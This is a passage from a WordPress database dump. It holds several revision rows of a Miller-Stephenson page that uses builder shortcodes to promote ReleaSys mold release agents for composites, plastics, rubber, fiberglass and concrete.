Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:42:57', '2017-06-07 15:42:57', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4480, 2, '2017-06-07 15:43:24', '2017-06-07 15:43:24', '[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:43:24', '2017-06-07 15:43:24', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4481, 2, '2017-06-07 15:47:19', '2017-06-07 15:47:19', '[section label="Simple Center" bg_color="rgb(245, 245, 245)" padding="60px" height="300px" border_color="rgb(235, 235, 235)"]\n\n[row]\n\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n[button text="Click me!"]\n\n\n[/col]\n\n[/row]\n\n[/section]\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:47:19', '2017-06-07 15:47:19', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4482, 0, '2017-06-07 15:53:09', '2017-06-07 15:53:09', '', '', '', 'publish', 'closed', 'closed', '', '4482', '', '', '2017-06-07 15:53:10', '2017-06-07 15:53:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4482/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4483, 2, '2017-06-07 15:54:22', '2017-06-07 15:54:22', '[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:54:22', '2017-06-07 15:54:22', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
